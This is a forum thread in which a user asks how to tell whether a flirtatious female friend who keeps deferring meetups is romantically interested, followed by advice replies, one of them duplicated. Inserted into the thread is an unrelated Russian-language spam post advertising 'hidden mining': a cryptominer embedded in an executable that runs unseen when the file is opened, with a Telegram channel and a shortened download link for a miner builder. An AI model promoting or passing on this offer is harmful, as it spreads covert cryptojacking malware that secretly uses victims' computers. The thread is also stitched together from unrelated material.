Stuck can anyone contribute

Aristotototopolous

So basically I like my friend. I don't know what to do because she talks to me rather often (every day) but I'm not sure how she feels about me. She does flirt with me, and she did give me her number easily when we exchanged them. However, whenever I ask her to meet up all I ever get is "I'll let you know" and she doesn't get back to me. She has asked to meet up before but I was genuinely busy. Any other girl and the obvious answer is give up the chase and if they are interested let them come to you, but to a friend? Thanks in advance

Maybe like many women, she enjoys being chased, or rather valued.

She clearly likes you, my only advice would be to let her come at you and initiate things more. If she likes you, she will.

We men love being valued too. Nothing is more pleasant than getting a text or a date suggestion from a woman we like.

hello Aristotototopolous,

It may be that your friend see's you as a friend so is treating you like one.

she talks a lot to you and also gave you her number easily. but that could be said of many people (friends or acquaintances) who got on well.

having someone's phone number doesn't always mean there is something else in it.

if you want to know if anything more concrete can happen then you have to talk to her its that simple; just don't get your hopes up too high or slam her if she's not that into it.

it maybe that she'd much prefer friendship and has hinted to you but you have misread things?

but whatever the situation is, I think you need to let her know that you feel more than you do, before the flirting starts to mislead you any further or hurts.

ok, that's it, good luck with it all; if its gonna happen it'll happen.

Hard to know what she thinks of you but I get the impression she sees you as a friend at the moment. That could change, but you would need to be a little flirtatious and let her come to you.

I was just responding to a member who complained about always getting a no and trying to figure out how to reduce that. My answer was discerning clear interest.

OP, a lady who's clearly interested doesn't put you off. She wants to grab your attention so you won't turn it to someone else.

Watch for that.

• Like 1
hello Aristotototopolous,

It may be that your friend see's you as a friend so is treating you like one.

she talks a lot to you and also gave you her number easily. but that could be said of many people (friends or acquaintances) who got on well.

having someone's phone number doesn't always mean there is something else in it.

if you want to know if anything more concrete can happen then you have to talk to her its that simple; just don't get your hopes up too high or slam her if she's not that into it.

it maybe that she'd much prefer friendship and has hinted to you but you have misread things?

but whatever the situation is, I think you need to let her know that you feel more than you do, before the flirting starts to mislead you any further or hurts.

ok, that's it, good luck with it all; if its gonna happen it'll happen.

This why women should never give out their number unless they

are willing to go out on a date with that man.

Men want a woman's number for one thing only. To ask her out.

Giving out her number lets the man think he has a shot and

will then ask her out. You do not want to go out with a man then

do not lead him on by giving him your number.

• Like 1

Майнинг

Все представляют под этим словом огромные машины для добычи криптовалюты, что нужно тратить много денег на покупку видеокарт, платить за электричество и т.п

Думаю все понимают что на майнинге можно много заработать

Но для этого нужна мощность

Но есть другой способ получить мощность без покупки аппаратуры.

Скрытый майнинг

Что это такое?

Это exe файл который вшит в исполняемый файл и запускается при открытии.

сам пользователь майнер не увидит, но он будет работать и приносить деньги

Читать далее

Читать инструкцию и скачать билдер майнера

Telegram: Канал @inmafiabtc!..

https://goo.gl/igKrSx

Ask her out for Dinner and Movies. Firm clear plans.

If she flakes. Then she is not into you Romantically and you can leave her be. She can try to catch up to you and make plans with you after that.